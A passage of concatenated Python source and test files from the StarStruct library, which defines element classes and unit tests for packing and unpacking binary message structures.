('ending_sequence', 'II', (0xAA, 0xBB)), # An ending sequence to a message
])
test_data = {
'regular': 13,
'fill_in_later': 4,
}
made = TestStruct.make(**test_data)
assert made.regular == 13
assert made.fill_in_later == 4
assert made.ending_sequence == (0xAA, 0xBB)
def test_unpack(self):
TestStruct = Message('TestStruct', [
('regular', 'B'), # Two regular messages
('fill_in_later', 'H'),
('ending_sequence', 'II', (0xAB, 0xBA)), # An ending sequence to a message
], Mode.Little)
test_data = {
'regular': 8,
'fill_in_later': 7,
}
test_bytes = b'\x08\x07\x00\xab\x00\x00\x00\xba\x00\x00\x00'
assert test_bytes == TestStruct.pack(**test_data)
unpacked = TestStruct.unpack(test_bytes)
assert unpacked.regular == 8
assert unpacked.fill_in_later == 7
assert unpacked.ending_sequence == (0xAB, 0xBA)
def test_unpack_in_the_middle(self):
SomeMessage = Message('SomeMessage', [
('regular', 'B'),
('irregular', 'B'),
('confused', 'B'),
])
TestStruct = Message('TestStruct', [
('regular', 'B'),
('middle_constant', 'II', (0xAB, 0xBA)),
('a_variable_length', 'H', 'msg'),
('msg', SomeMessage, 'a_variable_length')
], Mode.Little)
test_data = {
'regular': 8,
'a_variable_length': 2,
'msg': [
{'regular': 4, 'irregular': 0, 'confused': 6},
{'regular': 5, 'irregular': 2, 'confused': 4},
],
}
made = TestStruct.make(**test_data)
assert made.regular == 8
assert made.middle_constant == (0xAB, 0xBA)
packed = TestStruct.pack(test_data)
assert packed == b'\x08\xab\x00\x00\x00\xba\x00\x00\x00\x02\x00\x04\x00\x06\x05\x02\x04'
unpacked = TestStruct.unpack(packed)
assert unpacked.regular == 8
assert unpacked.middle_constant == (0xAB, 0xBA)
|
sprout42/StarStruct | starstruct/elementnone.py | <filename>starstruct/elementnone.py<gh_stars>1-10
"""
Element None
A non-packable, non-unpackable item that can help facilitate with additional information about an object,
pass extra references to a variable and potentially more
.. code-block:: python
ExampleMessage = Message('VarTest', [('x', 'B'), ('y', 'B')])
CRCedMessage = Message('CRCedMessage', [
('data', ExampleMessage), # A data field that has the example message in it
('extra_param', None), # The None Element
('crc', 'I', my_crc32, ['data', 'extra_param']), # Crc the data, and give an error if we have something unexpected
])
"""
from typing import Optional
from starstruct.element import register, Element
from starstruct.modes import Mode
@register
class ElementNone(Element):
"""
Initialize a StarStruct element object.
:param field: The fields passed into the constructor of the element
:param mode: The mode in which to pack the bytes
:param alignment: Number of bytes to align to
"""
def __init__(self, field: list, mode: Optional[Mode]=Mode.Native, alignment: Optional[int]=1):
self.name = field[0]
self.update(mode=mode, alignment=alignment)
@staticmethod
def valid(field: tuple) -> bool:
return len(field) == 2 \
and isinstance(field[0], str) \
and field[1] is None
def validate(self, msg):
return True
def update(self, mode=None, alignment=None):
if mode:
self._mode = mode
if alignment:
self._alignment = alignment
return
def pack(self, msg):
return b''
def unpack(self, msg, buf):
return (None, buf)
def make(self, msg):
return msg[self.name]
|
sprout42/StarStruct | starstruct/element.py | <filename>starstruct/element.py
"""StarStruct element class."""
from typing import Optional, Tuple
from starstruct.modes import Mode
def register(cls):
""" A handy decorator to register a class as an element """
Element.register(cls)
return cls
class Element(object):
"""
A class factory that determines the type of the field passed in, and
instantiates the correct class type.
"""
elementtypes = []
@classmethod
def register(cls, element):
"""Function used to register new element subclasses."""
cls.elementtypes.append(element)
@classmethod
def factory(cls, field: tuple, mode: Optional[Mode]=Mode.Native, alignment: Optional[int]=1):
"""
Initialize a StarStruct element object based on the type of element
parameters provided.
Where the values in the tuple determine the type of element.
These are the possible element types:
1. Normal (base): a standard python struct format character, and a
field name are provided. The optional element should not provided.
2. Enum: a standard python struct format character and field name are
provided, but the 3rd optional element is provided which is a
subclass of enum.Enum.
3. Length: a standard python struct format character that represents
an unsigned numeric value, and the field name are provided, but the
3rd optional element is provided and is a string. In this case the
string is assumed to be another field which is the name of a
Variable element.
4. Variable: a variable length element that accommodates 0 or more of
another StarStruct.message. The format field should be a valid
StarStruct.message, the optional 3rd element must be provided and
should be the name of a valid Length element or an int. The
validity of the referenced element must be checked after the
creation of the entire message with the Message.validate() function.
5. Discriminated: a message element that can have multiple formats
such as a C union. The format field should be a dictionary where
the keys represent values of a referenced enumeration field, and
the value for each entry is a valid StarStruct.message, or None.
The optional 3rd element must be provided and should be the name of
a valid Enum element. The validity of the referenced element must
be checked after the creation of the entire message with the
Message.validate() function.
:param field: The field must be a tuple of the following form::
(name, format, <optional>)
:param mode: The mode in which to pack the information.
:param alignment: The number of bytes to align objects with.
:returns: An element whose fields match those passed in
"""
if not isinstance(mode, Mode):
raise TypeError('invalid mode: {}'.format(mode))
# The field parameter is a single field tuple:
# ('name', 'format', <optional>)
if not isinstance(field, tuple):
raise TypeError('invalid element: {}'.format(field))
# The name of the element must be a non-null string or bytes
# provided in as the first part of the field tuple
if not field[0] or not isinstance(field[0], (str, bytes)):
raise TypeError('invalid name: {}'.format(field[0]))
valid_elems = []
for elem in cls.elementtypes:
try:
if elem.valid(field):
valid_elems.append(elem)
except (TypeError, KeyError):
continue
if len(valid_elems) > 1:
raise ValueError('More than one elemn was valid.\n\tField: {0}\n\tElems: {1}'.format(
field, valid_elems))
elif len(valid_elems) == 1:
return valid_elems[0](field, mode, alignment)
# If the function made it this far, the field specification is not valid
raise TypeError('invalid field: {}'.format(field))
@staticmethod
def valid(field: tuple) -> bool:
"""
Require element objects to implement this abstract function.
Validation function to determine if a field tuple represents a valid
element type.
The basics have already been validated by the Element factory class,
validate that the struct format is a valid numeric value.
:param field: The format specifier for an element
:returns: Whether this field tuple is valid for this class.
"""
raise NotImplementedError
def validate(self, msg: dict) -> bool:
"""
Require element objects to implement this function.
:param msg: The current values passed in to the element
:returns: Whether this message represents a valid element.
"""
raise NotImplementedError
def update(self, mode: Mode, alignment: int) -> None:
"""
Require element objects to implement this function.
:param mode: The new mode for the Element
:param alignment: The new alignment for the element
"""
raise NotImplementedError
def pack(self, msg: dict) -> bytes:
"""
Require element objects to implement this function.
:param msg: The values to pack into bytes
:returns: The msg packed into bytes as specified by the format
"""
raise NotImplementedError
def unpack(self, msg: dict, buf: bytes) -> Tuple[dict, bytes]:
"""
Require element objects to implement this function.
:param msg: The values unpacked thus far from the bytes
:param buf: The remaining bytes to unpack
:returns: The updated message and the remaining bytes
"""
raise NotImplementedError
def make(self, msg: dict):
"""
Require element objects to implement this function.
:param msg: The values to place into the named tuple object
:todo: How do I specify the correct type for this?
"""
raise NotImplementedError
|
sprout42/StarStruct | starstruct/tests/test_selfpack.py | <reponame>sprout42/StarStruct
#!/usr/bin/env python3
"""Tests for the starstruct class and its self packing"""
import struct
import unittest
from starstruct.message import Message
class TestStarStruct(unittest.TestCase):
"""Test class for self packing of messages"""
teststruct = [
('a', 'b'), # signed byte: -128, 127
('pad1', '3x'), # 3 pad bytes
('b', 'H'), # unsigned short: 0, 65535
('pad2', 'x'), # 1 pad byte
]
testvalues = [
{
'a': -128,
'b': 0,
},
{
'a': 127,
'b': 65535,
},
]
VarTest = Message('VarTest', [
('x', 'B'),
('y', 'B'),
])
Repeated = Message('Repeated', [
('x', 'B'),
('z', 'H'),
])
def test_self_pack(self):
my_message = Message('MyMessage', self.teststruct)
my_instance_1 = my_message.make(self.testvalues[0])
my_instance_2 = my_message.make(self.testvalues[1])
my_bytes_1 = my_message.pack(self.testvalues[0])
my_bytes_2 = my_message.pack(self.testvalues[1])
assert my_instance_1.pack() == my_bytes_1
assert my_instance_2.pack() == my_bytes_2
assert my_message._name == 'MyMessage'
assert my_instance_1._name == 'MyMessage'
def test_no_data(self):
num_repeats = 4
TestStruct = Message('TestStruct', [
('length', 'H', 'vardata'),
('vardata', self.VarTest, 'length'),
('repeated_data', self.Repeated, num_repeats),
])
test_data_no_data = {
'length': 0,
'vardata': [],
'repeated_data': [
],
}
made = TestStruct.make(test_data_no_data)
assert made.length == 0
assert made.vardata == []
assert made.repeated_data == []
packed = TestStruct.pack(test_data_no_data)
assert packed == struct.pack('H', 0) + (struct.pack('B', 0) + struct.pack('H', 0)) * num_repeats
assert packed == made.pack()
|
sprout42/StarStruct | starstruct/tests/test_length.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import enum
import struct
import unittest
import pytest
from starstruct.message import Message
class MyEnum(enum.Enum):
"""Possible enum types."""
THIS = 0
THAT = 1
OTHER = 2
MyNamed = Message('MyNamed', [
('type', 'B'),
('name', '32s'),
])
MyOtherNamed = Message('MyOtherNamed', [
('first', 'B'),
('second', 'H'),
('pad', '30x'),
])
NotSameMessage = Message('WowNotEvenClose', [
('first_and_only', '4H')
])
# pylint: disable=no-self-use
class TestLengthHelper(unittest.TestCase):
"""Test the length for this class"""
def test_empty_length(self):
empty_message = Message('Empty', [])
assert len(empty_message) == 0
def test_single_item(self):
one_message = Message('One', [
('info', 'H'),
])
assert len(one_message) == struct.calcsize('H')
def test_comparison(self):
assert len(MyNamed) == len(MyOtherNamed)
assert len(MyNamed) != len(NotSameMessage)
def test_bad_length_item(self):
bad_message = Message('BadMessage', [
('type', 'B', MyEnum),
('data', {
MyEnum.THIS: MyNamed,
MyEnum.THAT: NotSameMessage,
MyEnum.OTHER: MyOtherNamed,
}, 'type'),
])
with self.assertRaises(AttributeError):
print(len(bad_message))
def test_long_item(self):
long_message = Message('ThisIsALongOne', [
('ID', 'B'),
('delay', 'B'),
('a_byte', 'B'),
('type', 'B', MyEnum),
('data', {
MyEnum.THIS: MyNamed,
MyEnum.THAT: MyNamed,
MyEnum.OTHER: MyOtherNamed,
}, 'type'),
])
# Second size is from the MyNamed Enum above
my_named_format = 'B32s'
assert len(long_message) == struct.calcsize('BBBB' + my_named_format)
@pytest.mark.skip(reason="don't know how to test this")
def test_variable_length(self):
dont_know_how_to_test = Message('DontKnow', [
('numNames', 'B', 'names'),
('names', MyNamed, 'numNames'),
])
# Not sure how to test this one yet
# could do some multiples thing or just let it be.
print(len(dont_know_how_to_test))
|
sprout42/StarStruct | starstruct/elementcallable.py | <reponame>sprout42/StarStruct<gh_stars>1-10
"""
Element callable.
Call a function to validate data.
TODO: Update the format here
.. code-block:: python
from binascii import crc32
ExampleMessage = Message('VarTest', [('x', 'B'), ('y', 'B')])
CRCedMessage = Message('CRCedMessage', [
('data', ExampleMessage), # A data field that has the example message in it
('crc', 'I', crc32, ['data']), # Crc the data, and give an error if we have something unexpected
('crc', 'I', crc32, ['data'], False), # Crc the data, but don't give an error
])
Following creating this message, you have two options:
1. Specify a value. The function will be used to validate the value.
.. code-block:: python
def adder(x, y):
return x + y
AdderMessage = Message('AdderMessage', [
('item_a', 'H'),
('item_b', 'B'),
('function_data', 'I', adder, ['item_a', 'item_b']),
])
test_data = {
'item_a': 2,
'item_b': 5,
'function_data': 7,
}
made = AdderMessage.make(test_data)
assert made.item_a == 2
assert made.item_b == 5
assert made.function_data == 7
# If you specify the wrong value, you'll get a ValueError
test_data = {
'item_a': 2,
'item_b': 5,
'function_data': 33,
}
try:
made = AdderMessage.make(test_data)
except ValueError:
print('Told you so')
# Unless you specify `False` in your original item, then
# nobody will care.
2. Use the function to generate a value.
.. code-block:: python
def adder(x, y):
return x + y
AdderMessage = Message('AdderMessage', [
('item_a', 'H'),
('item_b', 'B'),
('function_data', 'I', adder, ['item_a', 'item_b']),
])
test_data = {
'item_a': 2,
'item_b': 5,
}
made = AdderMessage.make(test_data)
assert made.item_a == 2
assert made.item_b == 5
assert made.function_data == 7
"""
import copy
import struct
from typing import Optional
from starstruct.element import register, Element
from starstruct.modes import Mode
# pylint: disable=too-many-instance-attributes
@register
class ElementCallable(Element):
"""
Initialize a StarStruct element object.
:param field: The fields passed into the constructor of the element
:param mode: The mode in which to pack the bytes
:param alignment: Number of bytes to align to
"""
accepted_mesages = (True, False)
def __init__(self, field: list, mode: Optional[Mode]=Mode.Native, alignment: Optional[int]=1):
# All of the type checks have already been performed by the class
# factory
self.name = field[0]
# Callable elements use the normal struct packing method
self.format = field[1]
if isinstance(field[2], dict):
self.ref = field[2]
default_list = [None, None]
self._make_func = self.ref.get('make', default_list)[0]
self._make_args = self.ref.get('make', default_list)[1:]
self._pack_func = self.ref.get('pack', default_list)[0]
self._pack_args = self.ref.get('pack', default_list)[1:]
self._unpack_func = self.ref.get('unpack', default_list)[0]
self._unpack_args = self.ref.get('unpack', default_list)[1:]
elif isinstance(field[2], set):
instruction = field[2].copy().pop()
self.ref = {'all': instruction}
self._make_func = self._pack_func = self._unpack_func = instruction[0]
self._make_args = self._pack_args = self._unpack_args = instruction[1:]
if len(field) == 4:
self._error_on_bad_result = field[3]
else:
self._error_on_bad_result = True
self._elements = []
self.update(mode, alignment)
@property
def _struct(self):
return struct.Struct(self._mode.value + self.format)
@staticmethod
def valid(field: tuple) -> bool:
"""
See :py:func:`starstruct.element.Element.valid`
:param field: The items to determine the structure of the element
"""
required_keys = {'pack', 'unpack', 'make'}
if len(field) >= 3 and isinstance(field[0], str) and isinstance(field[1], str):
if isinstance(field[2], dict):
if set(field[2].keys()) <= required_keys and \
all(isinstance(val, tuple) for val in field[2].values()):
return True
elif isinstance(field[2], set):
return len(field[2]) == 1 and \
all(isinstance(val, tuple) for val in field[2])
return False
def validate(self, msg):
"""
Ensure that the supplied message contains the required information for
this element object to operate.
All elements that are Variable must reference valid Length elements.
"""
for action in self.ref.values():
for arg in action[1:]:
if arg in ElementCallable.accepted_mesages:
continue
elif isinstance(arg, str):
pass
elif hasattr(arg, 'decode'):
arg = arg.decode('utf-8')
elif hasattr(arg, 'to_bytes'):
arg = arg.to_bytes((arg.bit_length() + 7) // 8, self._mode.to_byteorder()).decode('utf-8')
if arg not in msg:
raise ValueError('Need all keys to be in the message, {0} was not found\nAction: {1} -> {2}'.format(arg, action, action[1:]))
def update(self, mode=None, alignment=None):
"""change the mode of the struct format"""
if mode:
self._mode = mode
if alignment:
self._alignment = alignment
def pack(self, msg):
"""Pack the provided values into the supplied buffer."""
pack_values = self.call_func(msg, self._pack_func, self._pack_args)
# Test if the object is iterable
# If it isn't, then turn it into a list
try:
_ = (p for p in pack_values)
except TypeError:
pack_values = [pack_values]
# Unpack the items for struct to allow for mutli-value
# items to be passed in.
return self._struct.pack(*pack_values)
def unpack(self, msg, buf):
"""Unpack data from the supplied buffer using the initialized format."""
ret = self._struct.unpack_from(buf)
if isinstance(ret, (list, tuple)) and len(ret) == 1:
# We only change it not to a list if we expected one value.
# Otherwise, we keep it as a list, because that's what we would
# expect (like for a 16I type of struct
ret = ret[0]
# Only check for errors if they haven't told us not to
if self._error_on_bad_result:
# Pretend we're getting a dictionary to make our item,
# but it has no reference to `self`. This is so we check
# for errors correctly.
temp_dict = copy.deepcopy(msg._asdict())
temp_dict.pop(self.name)
expected_value = self.call_func(msg, self._unpack_func, self._unpack_args)
# Check for an error
if expected_value != ret:
raise ValueError('Expected value was: {0}, but got: {1}'.format(
expected_value,
ret,
))
if self.name in self._unpack_args:
msg = msg._replace(**{self.name: ret})
ret = self.call_func(msg, self._unpack_func, self._unpack_args, original=ret)
return (ret, buf[self._struct.size:])
def make(self, msg):
"""Return the expected "made" value"""
# If we aren't going to error on a bad result
# and our name is in the message, just send the value
# No need to do extra work.
if not self._error_on_bad_result \
and self.name in msg \
and msg[self.name] is not None:
return msg[self.name]
ret = self.call_func(msg, self._make_func, self._make_args)
if self.name in msg:
if ret != msg[self.name]:
raise ValueError('Excepted value: {0}, but got: {1}'.format(ret, msg[self.name]))
return ret
def call_func(self, msg, func, args, original=None):
if func is None:
return original
items = self.prepare_args(msg, args)
return func(*items)
def prepare_args(self, msg, args):
items = []
if hasattr(msg, '_asdict'):
msg = msg._asdict()
for reference in args:
if isinstance(reference, str):
index = reference
attr = 'make'
elif isinstance(reference, bytes):
index = reference.decode('utf-8')
attr = 'pack'
else:
raise ValueError('Needed str or bytes for the reference')
items.append(
getattr(self._elements[index], attr)(msg)
)
return items
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.